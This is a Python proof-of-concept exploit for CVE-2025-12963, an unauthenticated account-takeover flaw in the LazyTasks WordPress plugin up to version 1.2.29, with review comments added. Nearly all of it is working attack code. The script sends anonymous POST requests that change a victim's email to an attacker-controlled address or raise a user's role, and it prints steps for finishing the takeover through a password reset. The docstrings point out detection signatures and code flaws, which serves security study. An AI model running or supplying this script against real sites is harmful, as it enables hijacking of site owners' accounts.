# CVE-2025-12963 PoC - LazyTasks Plugin Account Takeover
# Description: Unauthenticated privilege escalation via account takeover
# Affected: LazyTasks WordPress plugin <= 1.2.29
import requests
import sys
import re
class LazyTasksExploit:
    """Proof-of-concept client for CVE-2025-12963 (LazyTasks WordPress plugin <= 1.2.29).

    Every request this class sends is unauthenticated: no cookie, nonce or
    Authorization header is set anywhere below. From the defender's side that
    is the detection handle -- an anonymous POST to the route held in
    ``api_endpoint`` whose JSON body carries ``user_id`` plus ``email`` or
    ``role`` and an ``action`` key is exactly what this PoC emits, and is what
    a request log or WAF rule can match. The header of this file names the
    affected version range; an installed version outside it is the thing to
    verify rather than relying on ``check_vulnerability`` (see its docstring).
    """
    def __init__(self, target_url: str, target_email: str, attacker_email: str):
        """Store the target and attacker details used by every request.

        Args:
            target_url: Base URL of the WordPress site; a trailing ``/`` is
                stripped so it joins cleanly with the REST routes below.
            target_email: Kept as an attribute but not read by any method of
                this class (``main`` passes an empty string for it).
            attacker_email: Address the victim account's email is changed to
                in ``exploit_email_takeover``.
        """
        self.target_url = target_url.rstrip('/')
        self.target_email = target_email
        self.attacker_email = attacker_email
        # One plugin REST route serves both the email change and the role change.
        self.api_endpoint = '/wp-json/lazytasks/api/v1/user/role/edit/'
    def check_vulnerability(self) -> bool:
        """Check if target is vulnerable.

        Sends an unauthenticated GET to ``api_endpoint`` and treats a 200, 400
        or 405 as "the route is registered". Nothing here reads a plugin
        version or confirms the flaw, so this is a presence check, not a
        vulnerability check. Any other status, or a transport error, yields
        ``False``.
        """
        print(f'[*] Checking if {self.target_url} is vulnerable...')
        # Try to access the vulnerable endpoint
        check_url = f'{self.target_url}{self.api_endpoint}'
        try:
            response = requests.get(check_url, timeout=10)
            # 400/405 count as "present": the route answered, just not to a bare GET.
            if response.status_code in [200, 400, 405]:
                print('[+] Target appears to be running LazyTasks plugin')
                return True
        except requests.RequestException as e:
            print(f'[-] Error: {e}')
            return False
        return False
    def get_user_id(self, username: str):
        """Get WordPress user ID by username.

        Queries the core REST users route with ``?search=<username>`` and
        returns the ``id`` of the first hit. The bare ``except`` below swallows
        every failure of that lookup (transport errors, non-JSON bodies and
        missing keys alike). The fallback loop that follows is effectively dead
        code: it returns ``1`` on its first iteration, so only ``'admin'`` is
        ever printed and the result is always ``1`` whenever the REST lookup
        did not return.
        """
        print(f'[*] Getting user ID for username: {username}')
        # Try WordPress REST API user endpoint
        user_url = f'{self.target_url}/wp-json/wp/v2/users?search={username}'
        try:
            response = requests.get(user_url, timeout=10)
            if response.status_code == 200 and response.json():
                user_id = response.json()[0]['id']
                print(f'[+] Found user ID: {user_id}')
                return user_id
        except:
            # NOTE(review): bare except -- also catches KeyboardInterrupt/SystemExit.
            pass
        # Fallback: try to enumerate common admin usernames
        # NOTE(review): the return inside the loop fires on the first iteration,
        # so 'administrator' and `username` are never reached.
        for admin_user in ['admin', 'administrator', username]:
            print(f' Trying username: {admin_user}')
            return 1 # Default to admin user ID
    def exploit_email_takeover(self, username: str) -> bool:
        """Exploit the vulnerability to change target user's email.

        Resolves ``username`` via ``get_user_id`` and POSTs a JSON body with
        ``user_id``, ``email`` (the attacker address) and ``action``
        ``'update_email'`` to ``api_endpoint``, with no authentication header.
        A 200 or 201 is reported as success on status code alone; the response
        body is not inspected, so "success" here is unverified. Transport
        errors return ``False``.
        """
        print(f'[*] Exploiting email takeover vulnerability...')
        print(f'[*] Target email will be changed to: {self.attacker_email}')
        user_id = self.get_user_id(username)
        exploit_url = f'{self.target_url}{self.api_endpoint}'
        # Construct the exploit payload
        payload = {
            'user_id': user_id,
            'email': self.attacker_email,
            'action': 'update_email'
        }
        # Browser-like User-Agent; still the only headers sent are these two --
        # there is no auth material in the request at all.
        headers = {
            'Content-Type': 'application/json',
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
        }
        try:
            print(f'[*] Sending exploit request to {exploit_url}')
            response = requests.post(
                exploit_url,
                json=payload,
                headers=headers,
                timeout=10
            )
            if response.status_code in [200, 201]:
                print('[+] Email change request sent successfully!')
                print('[+] Check attacker email for password reset link')
                print(f'[*] Password reset will be sent to: {self.attacker_email}')
                return True
            else:
                # Only the first 200 chars of the body are shown on failure.
                print(f'[-] Exploit failed with status code: {response.status_code}')
                print(f'[-] Response: {response.text[:200]}')
                return False
        except requests.RequestException as e:
            print(f'[-] Error during exploit: {e}')
            return False
    def privilege_escalation(self, username: str, new_role: str) -> bool:
        """Exploit to escalate user privileges.

        Same route and request shape as ``exploit_email_takeover``, but the
        body carries ``role`` and ``action`` ``'update_role'``. Only a 200/201
        returns ``True``; any other status, and any exception (the bare
        ``except`` swallows everything, not just request errors), returns
        ``False``. This method is defined but never called from ``main``.
        """
        print(f'[*] Attempting privilege escalation for user: {username}')
        user_id = self.get_user_id(username)
        exploit_url = f'{self.target_url}{self.api_endpoint}'
        payload = {
            'user_id': user_id,
            'role': new_role,
            'action': 'update_role'
        }
        try:
            response = requests.post(
                exploit_url,
                json=payload,
                headers={'Content-Type': 'application/json'},
                timeout=10
            )
            if response.status_code in [200, 201]:
                print(f'[+] Successfully escalated {username} to role: {new_role}')
                return True
        except:
            # NOTE(review): bare except -- failures are silent; caller only sees False.
            pass
        return False
def main():
    """Command-line driver: ``<target_url> <target_username> <attacker_email>``.

    Runs only the presence check and the email-takeover step;
    ``privilege_escalation`` exists on the class but is never invoked here.
    The instance is built with an empty ``target_email``. Exit status is 1 on
    bad usage and 0 otherwise, regardless of whether the request succeeded --
    the return value of ``exploit_email_takeover`` is discarded.
    """
    if len(sys.argv) < 4:
        print('Usage: python cve-2025-12963.py <target_url> <target_username> <attacker_email>')
        # NOTE(review): the example address is mangled in the source as shown
        # ('[email protected]'); the literal was split across two lines by extraction.
        print('Example: python cve-2025-12963.py http://target.com admin [email protected]')
        sys.exit(1)
    target_url = sys.argv[1]
    target_username = sys.argv[2]
    attacker_email = sys.argv[3]
    # target_email is unused by the class, hence the empty string.
    exploit = LazyTasksExploit(target_url, '', attacker_email)
    if exploit.check_vulnerability():
        # "Potentially" is accurate: check_vulnerability only saw the route answer.
        print('[+] Target is potentially vulnerable!')
        print('\n[*] Step 1: Exploiting email takeover...')
        exploit.exploit_email_takeover(target_username)
        print('\n[!] After successful exploitation:')
        print(' 1. Check attacker email for password reset link')
        print(' 2. Click the reset link')
        print(' 3. Set new password to complete account takeover')
# Script entry point; nothing runs on import.
if __name__ == '__main__':
    main()